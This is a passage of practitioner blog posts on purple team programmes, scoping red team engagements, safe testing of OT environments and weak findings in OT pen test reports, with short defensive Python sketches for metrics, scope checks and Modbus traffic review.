Lateral movement to: [SQL server? File server? DC? Not everywhere—only where they'd go]
    ↓
Objective: [Exfil financial data? Plant backdoor? Disrupt systems?]

Blue team adds detection points:


Initial Access → EDR monitors suspicious process execution
    ↓ (if they evade)
Reverse shell → Firewall monitors outbound HTTPS to unknown IPs
    ↓ (if they evade)
Lateral movement → Network monitoring for admin tool usage on [specific systems]
    ↓ (if they evade)
Objective → Data loss prevention monitors file access patterns

Now you have an attack sequence + detection sequence. This is what you test. Not everything. This.

3. Red Team Operates Within Constraints (Ongoing)

Red team's job changes. They don't try to breach the environment. They try to follow the realistic threat path while evading detection.

Rules:

  • Start from your actual initial access vector (phishing, not "assume we're already in")
  • Move only to systems your threat model would target
  • Use tools/techniques your threat model would use
  • Avoid detection, don't just run commands

When red team succeeds: "We successfully executed the threat model while avoiding detection."

When red team fails: "We were detected at the lateral movement phase."

Both are valuable. Both tell blue team something real.

4. Blue Team Hunts Actively (Ongoing)

Blue team doesn't passively watch. They actively hunt for the attack.

Weekly threat hunting sessions:

  • "Given our threat model, what would the initial access look like?"
  • "What can we detect in the first 30 minutes?"
  • "Can we spot lateral movement before they reach the objective?"

Use Atomic Red Team playbooks, but scoped to your paths.

Update detection rules based on what red team teaches them about evasion.

5. Iterate (Monthly)

Once a month, red and blue teams sync:

  • What did red team learn about evasion?
  • What did blue team learn about detection?
  • Did our threat model change? (New threat intel, new attacks in the wild?)
  • How did we do against a realistic attack? Did we detect it faster than last month? Did we detect more of it?

Adjust next month's exercises based on findings.

The Governance

For this to work, you need:

Time allocation:

  • Red team: 20% of their week to collaborative exercises (not 100% red ops)
  • Blue team: 5–10% of SOC time to active hunting (not just passive monitoring)
  • Leadership: Time for monthly sync and iteration

Metrics (not vanity metrics):

  • Mean time to detect (for the threat model you care about)
  • Mean time to respond
  • Techniques red team is using that blue team isn't catching
  • Detection improvements month-over-month
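The first two metrics are simple arithmetic once each exercise records three timestamps. This is a sketch under assumptions: the tuple layout and function names are illustrative, and it only counts exercises where a detection actually happened. Attacks that were never detected need to be reported separately, not averaged away.

```python
from datetime import datetime, timedelta
from statistics import mean
from typing import List, Tuple

# Each exercise: (attack start, first detection, containment).
# The layout is an assumption made for this sketch.
Exercise = Tuple[datetime, datetime, datetime]


def mean_time_to_detect(exercises: List[Exercise]) -> timedelta:
    """Average gap between attack start and first detection."""
    seconds = mean((detected - start).total_seconds()
                   for start, detected, _ in exercises)
    return timedelta(seconds=seconds)


def mean_time_to_respond(exercises: List[Exercise]) -> timedelta:
    """Average gap between first detection and containment."""
    seconds = mean((contained - detected).total_seconds()
                   for _, detected, contained in exercises)
    return timedelta(seconds=seconds)
```

Compute both per threat model, not across every exercise you have ever run, so that month-over-month movement reflects the path you care about.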

Escalation path: If red team finds something critical (a real vulnerability, not just "technique works"), what happens? It shouldn't sit in a queue until the quarterly debrief.

The Uncomfortable Part

This takes time. It's not shiny. It doesn't fit neatly on a security audit checklist.

You can't outsource it to a quarterly consultant. You need your own people, aligned on threat model, collaborating continuously.

If you don't have budget for this, purple teaming won't work. You'll go through the motions and get the theatre. You won't get the results.

But if you do this right, you get something real:

  • Red team that understands why they're testing what they're testing
  • Blue team that detects threats faster
  • Security operations that improve month-over-month
  • Collaborative culture instead of siloed teams

Checklist: Do You Have a Real Purple Team Programme?

  • [ ] Shared, documented threat model (written, agreed by red + blue + leadership)
  • [ ] Realistic attack paths (not "test everything," but specific sequences)
  • [ ] Red team constrained to threat model (not unlimited scope)
  • [ ] Blue team actively hunting (not passively monitoring)
  • [ ] Monthly sync between teams (with iteration, not just reporting)
  • [ ] Detection improving month-over-month (measurable)
  • [ ] Budget allocated (not "squeeze in around other work")

If you don't check most of these, you have a red team and a blue team. You don't have purple teaming.


Further Reading:

  • Practical Purple Teaming (Alfie Champion): The operational playbook
  • VECTR: Platform for planning and tracking red, blue, and purple team testing
  • Active Defense: Threat modelling for defence

Question: Do you have a documented threat model that both red and blue teams agree on? Start there.


Next week: Building a threat model with your team. Plus: How to measure purple team ROI without vanity metrics.

Red Team · Purple Teaming · Threat Modelling

How to Scope a Red Team Engagement That Tells You Something Real

Hugh McGauran · 16 April 2026 · 6 min read

Most red team engagements produce an impressive document and a set of "critical findings" that the security team could have predicted before the first phishing email was sent.

The problem is usually not the red team. It's the scope conversation. Nobody has it properly.

Here is how to have it.

Start with the question you actually want answered

The scoping conversation that produces useless engagements sounds like this:

"Test our security posture against advanced threats. Be creative."

The scoping conversation that produces useful engagements sounds like this:

"Given that our primary threat is financially motivated actors targeting customer payment data, can they reach the payment processing systems from a compromised workstation in our Manchester office, and would we detect them before they got there?"

The second version has a specific adversary, a specific entry point, a specific objective, and a detection question embedded in it. The first version has none of those things, so red team invents all of them — usually in their own favour.

Your first job in scoping is to write down the question you want answered. One paragraph. If you cannot write it down, you are not ready to scope.

Build scope from threat model, not from technique list

Most scoping starts with techniques: "We want to test phishing, lateral movement, persistence, and exfil." That is backwards.

Start with the threat model:

  • Who is likely to target us? Be specific. Financially motivated criminals? Competitors? Nation-state? Insider?
  • What do they want? What data or systems are the actual target?
  • How do they typically get in? Phishing? Supply chain? Exposed credentials?
  • What does realistic movement look like? Not "everything on the network" — what would they actually try to reach and how?
  • What constraints do they operate under? Time pressure? Detection avoidance? Noise tolerance?

Once you have answered those questions, the technique list writes itself. And more importantly, techniques that do not fit your actual threat model get dropped.

Write explicit success and failure criteria

This is the single most neglected part of red team scoping. Most engagements have no stated criteria for what success looks like.

Without success criteria, red team will always succeed — because they define success as "we got somewhere interesting."

Write it down before the engagement:

Success for red team: They reach the target system, exfiltrate a defined data set, and do so without detection.

Success for blue team: They detect the activity within a defined time window, from a defined detection point, and contain it before the objective is reached.

Partial success: What does it mean if red team reaches the target but is detected? What if they are not detected but never reach the target because segmentation blocked them?

These definitions have to be agreed by both teams and by leadership before the engagement starts. They cannot be redefined after the fact.
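Writing the criteria as code before the engagement is one way to stop them being redefined afterwards. The sketch below is an assumption about how you might encode them: the outcome names are invented for illustration, and it leaves out the "defined detection point" condition, which you would add as another parameter.

```python
from enum import Enum
from typing import Optional


class Outcome(Enum):
    RED_SUCCESS = "objective reached, never detected"
    BLUE_SUCCESS = "detected inside the window, objective not reached"
    REACHED_BUT_DETECTED = "partial: objective reached, but detected"
    BLOCKED_BUT_UNDETECTED = "partial: objective not reached, never detected"
    CONTAINED_BUT_SLOW = "partial: objective not reached, detected outside the window"


def classify(objective_reached: bool,
             minutes_to_detect: Optional[float],
             window_minutes: float) -> Outcome:
    """Map raw exercise facts onto the outcome agreed before the engagement.

    minutes_to_detect is None when blue team never detected the activity.
    """
    detected = minutes_to_detect is not None
    if objective_reached:
        return Outcome.REACHED_BUT_DETECTED if detected else Outcome.RED_SUCCESS
    if not detected:
        # e.g. segmentation stopped red team, but nobody saw them
        return Outcome.BLOCKED_BUT_UNDETECTED
    if minutes_to_detect <= window_minutes:
        return Outcome.BLUE_SUCCESS
    return Outcome.CONTAINED_BUT_SLOW
```

The point of the partial outcomes is that each one implies a different follow-up: `BLOCKED_BUT_UNDETECTED` is a detection gap even though the objective was never reached.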

Define the starting position precisely

"Assume initial access" is not a starting position. It is an excuse to skip the hardest part.

For a useful engagement, the starting position should be:

  • Where exactly is red team? A phishing-compromised user workstation in a specific office? A contractor account? A supply chain compromise?
  • What access does that starting position realistically give them? What systems can they reach? What credentials do they have? What can they see?
  • What controls are in place at that starting position? EDR, network monitoring, conditional access?

If you say "assume workstation compromise in the marketing department," that means red team starts with the access a phished marketing employee actually has — not admin on the domain controller.

Scope systems explicitly, not by implication

The most common scoping failure: undefined boundaries.

If you do not explicitly say a system is in scope, red team will assume it is. That leads to findings on systems that have nothing to do with your threat model, which wastes everyone's time.

Write it out:

In scope:

  • Workstations in the Manchester office
  • The shared file server at [address]
  • The payment processing staging environment
  • Credentials available from a phished marketing employee

Out of scope:

  • Production payment systems (test in staging only)
  • SCADA and operational technology systems
  • HR systems (different threat model, separate engagement)
  • Any system requiring physical access

If you do not write the out-of-scope list, red team will find their way into systems that generate impressive-sounding findings but tell you nothing about the threat you actually face.
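The scope lists can also be made checkable. In this sketch the system identifiers are hypothetical stand-ins for the example lists above, and the rationale for the OT entry is a placeholder because the example does not give one. The design choice that matters is the last branch: anything unlisted is a reason to stop and ask, not implicit permission.

```python
from typing import Dict, Set

# Hypothetical identifiers standing in for the example scope lists.
IN_SCOPE: Set[str] = {
    "manchester-workstations",
    "shared-file-server",
    "payments-staging",
}

# Out-of-scope systems, each with a brief rationale.
OUT_OF_SCOPE: Dict[str, str] = {
    "payments-production": "test in staging only",
    "scada-ot": "rationale to be agreed (placeholder)",
    "hr-systems": "different threat model, separate engagement",
}


def check_target(target: str) -> str:
    """Say whether red team may touch a system under the agreed scope."""
    if target in OUT_OF_SCOPE:
        return f"out of scope: {OUT_OF_SCOPE[target]}"
    if target in IN_SCOPE:
        return "in scope"
    # Unlisted systems are not assumed to be in scope.
    return "unlisted: stop and ask before touching"
```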

Agree time constraints upfront

Most real attackers do not get unlimited attempts over several weeks. They work under time pressure.

Define it:

  • Red team has 48 hours from initial access to reach the objective
  • If not reached in 48 hours, the engagement concludes that phase
  • Blue team knows an exercise is running and is actively hunting from hour zero

This changes the exercise significantly. Red team cannot brute-force their way through every possible technique. They have to prioritise, which is what a real attacker does.

The detection question is as important as the access question

Most scoping focuses entirely on whether red team can reach the objective. That is only half the question.

The equally important question: at what point does blue team know red team is in the environment?

Design the scope to answer both:

  • Can an attacker reach the target? (access question)
  • When and how would we know they were there? (detection question)

If you only answer the first question, you learn you have a gap but not how to close it. If you answer both, you have something to act on.

Practical scope document structure

A usable scope document has six sections:

  1. The question — one paragraph, what you are trying to learn
  2. Threat model — who, what they want, how they operate
  3. Starting position — precise definition of initial access and access level
  4. In scope systems — explicit list, no ambiguity
  5. Out of scope systems — explicit list, with brief rationale
  6. Success and failure criteria — defined for red team, blue team, and partial outcomes

That document gets signed off by red team lead, blue team lead, and the engagement sponsor before anyone runs a single command.
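If the scope document lives somewhere structured, the "nobody runs a command until it is complete and signed" rule can be enforced mechanically. This is a sketch with assumed field names that mirror the six sections; it checks only that each section is non-empty, not that the content is any good.

```python
from dataclasses import dataclass, field, fields
from typing import List, Set

REQUIRED_SIGNATORIES = {"red team lead", "blue team lead", "engagement sponsor"}


@dataclass
class ScopeDocument:
    question: str = ""
    threat_model: str = ""
    starting_position: str = ""
    in_scope: List[str] = field(default_factory=list)
    out_of_scope: List[str] = field(default_factory=list)
    success_criteria: str = ""
    signed_off_by: Set[str] = field(default_factory=set)

    def blockers(self) -> List[str]:
        """List everything that must be fixed before the engagement starts."""
        problems = [
            f"missing section: {f.name}"
            for f in fields(self)
            if f.name != "signed_off_by" and not getattr(self, f.name)
        ]
        problems += [
            f"missing sign-off: {who}"
            for who in sorted(REQUIRED_SIGNATORIES - self.signed_off_by)
        ]
        return problems
```

An empty list from `blockers()` is the go signal; anything else is a conversation that has not happened yet.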

The uncomfortable outcome of good scoping

When you scope properly, two things happen that most organisations find uncomfortable.

First, red team may fail. They may not reach the objective within time constraints, because your controls work for the threat model you care about. That is a good outcome. It should be celebrated, not treated as a sign the exercise was not worthwhile.

Second, the findings are narrower. You will not get a 40-page report with 200 findings. You will get a precise answer to the precise question you asked. That is more valuable, but it looks less impressive in a board deck.

If your organisation rewards impressive-looking reports over honest answers, that is a culture problem. Fix the culture, not the scope.


Next week: Building a detection baseline — the work nobody wants to do, and why it is the foundation of everything else.

OT Security · Purple Teaming · ICS · Critical Infrastructure

Purple Teaming OT: Why 'We Can't Test That' Is No Longer Acceptable

Hugh McGauran · 23 April 2026 · 6 min read

I keep hearing the same thing in conversations about operational technology security.

"We can't purple team OT. The risk is too high. You can't test live systems."

That view made sense in 2015. It does not make sense now. The threat actors attacking energy, utilities, and critical infrastructure are not holding back out of concern for operational continuity — and your detection capability has no idea whether it works until you test it.

The question is not whether to test OT environments. The question is how to do it without causing the incident you are trying to prevent.

The real problem is not the systems — it is the approach

When people say OT cannot be tested, they usually mean one of two things: they tried to apply IT purple team methodology directly to OT and something broke, or they have never done it and they are extrapolating from the horror stories of people who did it wrong.

OT environments are unforgiving. A misconfigured command to a PLC does not generate a BSOD — it can trigger a physical consequence. Latency-sensitive protocols like Modbus and DNP3 respond badly to unexpected traffic. Safety instrumented systems exist for a reason.

None of that means you cannot test. It means you need to be more disciplined about how you do it.

Three principles that change the equation

1. Craft TTPs with clear operational objectives before you touch anything

Every TTP you plan to emulate must be tied to a specific detection question. Not "can we simulate Industroyer?" but "if an adversary used Industroyer's lateral movement pattern from the engineering workstation to the HMI, would our SIEM alert on it, and within what timeframe?"

The TTP is a vehicle. The detection question is the destination. If you cannot articulate the detection question, you are not ready to run the test.

This forces the red team to think like a threat, and forces the blue team to pre-commit on what good detection looks like — before they know the outcome.

2. Test on virtual environments first, without exception

A high-fidelity OT testbed is not optional — it is the prerequisite for running any test in a live environment. Most asset owners in energy and utilities either have one or can access one through their ICS vendor or an MSSP with OT capability.

You run the full TTP in the virtual environment. You validate that it behaves as expected. You confirm that the detection logic fires (or confirm that it does not, which is itself a finding). You document the exact execution sequence, timing, and expected artefacts.

Only then do you consider a controlled execution in the live environment — and only for those elements where live-environment fidelity actually matters to the detection question.

3. D-Day tests are controlled, time-boxed, and pre-notified to operations

If you run a test in a live OT environment without the operations team knowing the time window, you have created unnecessary risk and guaranteed a bad outcome if anything goes wrong.

The D-Day test is not a surprise for operations — it is a surprise for the SOC. The operations team knows: time window, what systems are in scope, what the abort condition is, and who the single point of contact is if they need to halt. The SOC does not know it is happening.

This structure lets you get genuine detection fidelity without creating an incident.
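The conditions for a D-Day test read naturally as a pre-flight check. The sketch below is one possible encoding, with hypothetical field names; it also folds in the earlier principle that nothing runs live before it has been validated on the testbed.

```python
from dataclasses import dataclass
from datetime import datetime
from typing import List


@dataclass
class DDayPlan:
    window_start: datetime
    window_end: datetime
    systems_in_scope: List[str]
    abort_condition: str
    ops_contact: str            # single point of contact who can halt the test
    ops_notified: bool
    soc_notified: bool          # should stay False for a blind detection test
    validated_on_testbed: bool


def preflight(plan: DDayPlan) -> List[str]:
    """Return the reasons this plan is not ready to run; empty means ready."""
    issues = []
    if plan.window_end <= plan.window_start:
        issues.append("time window is empty or inverted")
    if not plan.systems_in_scope:
        issues.append("no systems listed in scope")
    if not plan.abort_condition.strip():
        issues.append("no abort condition defined")
    if not plan.ops_contact.strip():
        issues.append("no single point of contact for operations")
    if not plan.ops_notified:
        issues.append("operations team has not been notified")
    if plan.soc_notified:
        issues.append("SOC has been told, so detection will not be a blind test")
    if not plan.validated_on_testbed:
        issues.append("TTP has not been validated on the testbed")
    return issues


def may_execute(plan: DDayPlan, now: datetime) -> bool:
    """Allow execution only with a clean pre-flight, inside the agreed window."""
    return not preflight(plan) and plan.window_start <= now <= plan.window_end
```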

What you will find

The findings from OT purple team exercises are remarkably consistent. I have seen variants of the same list across energy clients, utilities, and manufacturing environments:

  • Logs not piped to the SIEM. OT assets generating security-relevant events — historians, HMIs, engineering workstations — are either not logging or logging to a destination that nobody monitors. The SOC has no visibility into what is probably your most targeted environment.
  • Inconsistent asset classification. The asset inventory treats a Windows-based HMI the same as a corporate laptop. Different patch cadence, different network controls, different authentication standards — but the risk classification does not reflect it. Detection rules built for IT assets do not translate.
  • Detection tools not calibrated for OT protocols. If your SIEM ingests OT network traffic, the alert rules were almost certainly written for IT traffic patterns. Modbus function code anomalies, unexpected DNP3 unsolicited responses, and OPC-UA enumeration all look different from SQL injection and lateral movement in Active Directory.
  • No playbooks for OT incidents. The SOC knows what to do when a Windows endpoint is compromised. They have no playbook for a compromised engineering workstation with a live connection to a control system. The decision escalation path does not exist.

None of these findings require you to break anything to discover them. They require you to ask the right questions, map the visibility gaps, and test whether your detection logic can see what it needs to see.
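Mapping the visibility gap can start as a comparison of two lists: what the asset inventory says exists, and what the SIEM has actually received events from. A minimal sketch, assuming you can export both; the asset names and classes in the usage example are invented.

```python
from typing import Dict, List, Set


def visibility_gaps(inventory: Dict[str, str],
                    siem_sources: Set[str]) -> Dict[str, List[str]]:
    """Group OT assets that have sent nothing to the SIEM by asset class.

    inventory maps asset name -> asset class (e.g. "HMI", "historian").
    siem_sources is the set of asset names seen as log sources.
    """
    gaps: Dict[str, List[str]] = {}
    for asset, asset_class in inventory.items():
        if asset not in siem_sources:
            gaps.setdefault(asset_class, []).append(asset)
    return {asset_class: sorted(assets) for asset_class, assets in gaps.items()}
```

For example, with an inventory of `{"hmi-01": "HMI", "hmi-02": "HMI", "hist-01": "historian", "ews-01": "engineering workstation"}` and SIEM sources `{"hmi-01", "ews-01"}`, the result is `{"HMI": ["hmi-02"], "historian": ["hist-01"]}`. That output is a finding in its own right, and nothing was touched to produce it.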

The asymmetry argument

Here is the strategic case if you still need one.

Adversaries targeting OT environments — state actors, ransomware groups operating in critical infrastructure, hacktivists — are already doing the reconnaissance. Volt Typhoon spent years in US critical infrastructure. Sandworm has hit power grids twice with demonstrable effect. ALPHV hit pipeline infrastructure without triggering a single pre-incident detection.

Your detection coverage in OT is either tested and validated, or it is assumed. Assumption is not a defence posture.

The risk of a controlled, well-scoped purple team exercise is small. The risk of finding out your detection capability is non-existent during an actual incident is significant.

Where to start

If you have not done OT purple teaming before, start narrow:

  1. Pick one site, one asset class, one threat scenario. Not the whole estate.
  2. Get a high-fidelity testbed. If you do not have one, find a vendor or partner who does.
  3. Define three detection questions before you write a single TTP.
  4. Run the testbed exercise end to end. Document every gap.
  5. Fix what you can fix before you touch the live environment.
  6. Only then plan a live D-Day test, and only for the detection questions where live fidelity is essential.

The first exercise will produce more findings than you can action in a quarter. That is fine. You will have replaced assumption with evidence — and evidence is how you prioritise.


Hugh McGauran is Country Manager for Ireland at Armis and has 25 years of experience in cybersecurity. PurpleTeamAI explores practical purple team methodology for practitioners who need results, not frameworks.

OT Security · Purple Teaming · ICS · Pen Testing

The 7 Most Pointless Findings in OT Pen Tests

Hugh McGauran · 30 April 2026 · 8 min read

If you run enough OT pen tests, you start to notice a pattern. The report arrives, the client is confused, and the findings have a peculiar quality: technically correct, operationally impossible to remediate, and almost entirely beside the point.

The pattern is always the same. An IT security methodology gets run through an OT environment without adjusting for the context in which those systems operate. A report full of CVEs follows. The client cannot action half of it. The red team writes the same boilerplate recommendations they would write for a corporate network. The OT engineers roll their eyes and nothing changes.

Here are the seven findings I see most often that tell you more about the assessor's understanding of IT security than they do about the actual risk in the environment.

1. Plaintext Protocol

The finding: Modbus/TCP is unencrypted. This is a critical finding.

Why it is the wrong question: The Modbus already installed in your plant is never going to be encrypted. The protocol dates from 1979 and was designed for serial communication between PLCs and HMIs inside a single control loop. A TLS-wrapped variant, Modbus/TCP Security, has been specified, but adopting it means replacing or upgrading every device in the loop at the same time, because the protocol is the interface. You cannot upgrade one end of a Modbus conversation without breaking the other.

What actually matters: The attack surface here is not confidentiality — it is proximity. If an adversary is on the same network segment as your Modbus traffic, you have larger problems than encryption. The question is network segmentation: what else is on the segment, and what lateral movement is possible from that position? Focus on whether the Modbus network is appropriately isolated from corporate IT, not whether the protocol uses TLS.
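The isolation question can be tested against flow records you probably already have. The sketch below assumes flows have been exported as (source IP, destination IP, destination port) tuples and that OT address space is known; the subnet is a hypothetical addressing plan. It flags any Modbus/TCP connection that reaches an OT address from outside OT.

```python
import ipaddress
from typing import Iterable, List, Tuple

MODBUS_TCP_PORT = 502  # registered port for Modbus/TCP

# Hypothetical addressing plan: replace with your own OT ranges.
OT_NETWORKS = [ipaddress.ip_network("10.50.0.0/16")]

Flow = Tuple[str, str, int]  # (source IP, destination IP, destination port)


def is_ot(address: str) -> bool:
    """True if the address falls inside any known OT network."""
    ip = ipaddress.ip_address(address)
    return any(ip in network for network in OT_NETWORKS)


def modbus_boundary_violations(flows: Iterable[Flow]) -> List[Flow]:
    """Return Modbus/TCP flows that reach an OT device from a non-OT source."""
    return [
        flow for flow in flows
        if flow[2] == MODBUS_TCP_PORT and is_ot(flow[1]) and not is_ot(flow[0])
    ]
```

Any hit is a more useful finding than "Modbus is unencrypted", because it names a path across the boundary that should not exist.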


2. SNMP Default Community String

The finding: The SNMP community string is set to the vendor default.

Why it is the wrong question: On managed switches inside a properly segmented OT network, the risk from SNMP community strings is minimal. These devices are not exposed to the internet, not reachable from corporate IT without crossing a firewall, and the attack path requires an already-compromised position on the OT network. Changing the community string on a managed switch does not prevent an adversary who has already reached that network segment from doing damage.

What actually matters: The question is not whether the community string is default — it is whether the OT network is segmented from IT at the firewall level, and whether there are compensating controls that would detect or prevent an adversary from establishing the initial position required to exploit SNMP. If you have no IT/OT boundary control, that is the finding.


3. Unsupported Operating System

The finding: Windows XP Embedded HMI. Vendor is defunct. Operating system is end of life. Critical risk.

Why it is the wrong question: Yes, Windows XP Embedded is end of life. Yes, there are published CVEs. The finding is accurate. But the remediation cannot be to replace a running HMI that a plant operator spent ten years commissioning and tuning: the vendor no longer exists, and a replacement would mean re-commissioning the entire control loop.

What actually matters: What is the actual exploitability in this environment? Is the HMI reachable from corporate IT? Is it reachable from the internet? Can it initiate outbound connections? An HMI that is fully air-gapped from everything except the PLC it talks to is a very different risk to one that sits on an IT network with a path to the internet. Tell the client what compensating controls reduce the actual risk — network segmentation, application whitelisting, monitoring — not what they already know they cannot do.
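Those three questions can be turned into a simple triage that ranks legacy assets by exposure instead of by CVE count. This is a sketch only: the priority ordering and the wording of each result are assumptions made for illustration, not an established scoring scheme.

```python
from dataclasses import dataclass


@dataclass
class Exposure:
    """Answers to the three reachability questions for one legacy asset."""
    reachable_from_internet: bool
    reachable_from_corporate_it: bool
    can_initiate_outbound: bool


def triage(exposure: Exposure) -> str:
    """Rank an end-of-life asset by how an adversary could actually reach it.

    The ordering below is an illustrative assumption.
    """
    if exposure.reachable_from_internet:
        return "priority 1: remove the internet path"
    if exposure.reachable_from_corporate_it:
        return "priority 2: enforce the IT/OT boundary"
    if exposure.can_initiate_outbound:
        return "priority 3: block and monitor outbound connections"
    return "priority 4: isolated, keep monitoring and review periodically"
```

Two HMIs with the same operating system and the same CVE list can land at opposite ends of this ranking, which is the distinction the report should be making.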


4. No Timed Account Lock

The finding: Workstations do not enforce account lockout after failed login attempts. This is a security misconfiguration.

Why it is the wrong question: These are control room workstations. During an emergency (a plant trip, a safety event, a night-shift operator responding to an alarm), the last thing you want is a workstation locking out the operator who is trying to bring a system back to a safe state. Leaving account lockout disabled is a deliberate decision by the plant's safety and operations team, not an oversight.

What actually matters: What is the physical access control on these workstations? Are they shared accounts? Is there monitoring on the account usage? Is the network-level access to these workstations controlled? The security concern behind account lockout policies — preventing brute force — can be addressed through network-level controls, proximity to the asset, and monitoring. Do not recommend the removal of a safety control without addressing the underlying concern it was designed to handle.


5. Deploy EDR

The finding: EDR is not deployed on PLCs and field devices.

Why it is the wrong question: PLCs run proprietary firmware. You cannot install software on them. There is no operating system that EDR supports. This finding demonstrates that the assessor ran a vulnerability scanner against the asset list without understanding what a PLC is or how it operates. The client will notice this. It undermines the credibility of everything else in the report.

What actually matters: EDR on engineering workstations and HMIs is a legitimate finding if it is missing — those are Windows or Linux systems that can run EDR agents. The more relevant question is whether the engineering workstation, if compromised, can reach the PLC and what the adversary can do from that position. That is the actual attack path. EDR on the PLC is not the control; network segmentation and monitoring of the engineering workstation are.


6. Disable Unnecessary Services

The finding: Unnecessary services are running on RTUs. These should be disabled.

Why it is the wrong question: RTU firmware is locked by the manufacturer. You cannot disable services on it any more than you can disable services on the firmware of a power supply. The RTU ships with a firmware image. That image is certified against the version of the protocol it implements. Flashing a modified firmware image would void the certification, potentially breach the vendor's support agreement, and in many jurisdictions for critical infrastructure would require re-certification of the entire system.

What actually matters: What is the actual threat model for these RTUs? Are they reachable from a compromised engineering workstation? Can they be reached directly across the network? The attack surface on a locked RTU is almost entirely in the hands of whatever can communicate with it — which is usually the control system network, not the RTU itself. Tell the client to focus on who can talk to the RTU and what commands are accepted, not on the services running inside the firmware.
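"Who can talk to the RTU and what commands are accepted" can be expressed as an allowlist of function codes per source. The sketch below assumes the RTU speaks Modbus/TCP and that you can see raw TCP payloads from a tap or span port. The source addresses and the policy are hypothetical; the frame layout (a 7-byte MBAP header followed by the function code) and the function code numbers are standard Modbus.

```python
import struct
from typing import Dict, Optional, Set

# Standard Modbus write function codes:
# 5 write single coil, 6 write single register,
# 15 write multiple coils, 16 write multiple registers.
WRITE_FUNCTION_CODES = {5, 6, 15, 16}

# Hypothetical policy: which sources may send which function codes.
# 3 = read holding registers, 4 = read input registers.
ALLOWED: Dict[str, Set[int]] = {
    "10.50.1.10": {3, 4, 6, 16},  # engineering workstation: reads and writes
    "10.50.1.20": {3, 4},         # historian: reads only
}


def modbus_function_code(payload: bytes) -> Optional[int]:
    """Extract the function code from a Modbus/TCP frame, or None if malformed."""
    if len(payload) < 8:
        return None
    # MBAP header: transaction id, protocol id, length, unit id (big-endian).
    _txn, protocol_id, _length, _unit = struct.unpack(">HHHB", payload[:7])
    if protocol_id != 0:  # protocol id is always 0 for Modbus
        return None
    return payload[7]


def review(source_ip: str, payload: bytes) -> str:
    """Compare one observed request against the per-source allowlist."""
    code = modbus_function_code(payload)
    if code is None:
        return "ignore: not a Modbus/TCP frame"
    if code in ALLOWED.get(source_ip, set()):
        return "expected"
    kind = "write" if code in WRITE_FUNCTION_CODES else "non-write"
    return f"alert: unexpected {kind} function code {code} from {source_ip}"
```

A write from the historian, or any request from a source that is not in the policy at all, is the kind of event worth alerting on. None of this requires changing anything on the RTU.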


7. SSH v1 Is Enabled

The finding: SSH version 1 is enabled on field devices.

Why it is the wrong question: In an ideal world, SSH v1 would not be enabled. SSH v2 has been standard for twenty years. The finding is accurate. The remediation — replacing the firmware on 400 field devices to remove SSH v1 — would cost more than most of these organisations' entire annual security budget, and there is no vendor-provided mechanism to do it on many of these devices.

What actually matters: Is SSH the actual attack vector here? An adversary who can reach port 22 on 400 field devices has likely already achieved a position that is more useful to them than exploiting SSH v1. The finding is a proxy. The real finding is: how did an adversary get to the point where they can reach port 22 on 400 field devices? Fix that problem first. The SSH v1 finding is a symptom, not the disease.


The Real Problem: Reports Written for Nessus, Not for OT

The common thread across all seven findings is the same. The assessor applied an IT security framework to an OT environment without adjusting for operational context. The findings are accurate in the abstract. They are useless in practice because the remediation path is either operationally impossible, financially disproportionate, or would introduce greater risk than the original finding.

Good OT pen test reports focus on what an adversary can actually do to the physical process, not on what a vulnerability scanner flags as critical. Flare risers, emergency shutdowns, valve positions, tank levels, process integrity: these are the consequences that matter in an OT environment. A finding that says "an adversary who compromises the engineering workstation can modify setpoints on the HMI and cause a process upset" is worth ten CVE criticals. A finding that says "CVE-2024-XXXX on Windows XP Embedded HMI" tells the client nothing they did not already know and nothing they can act on.

The environments are different. The risks are different. The fixes are not the same.

Write the report your OT client can actually use.


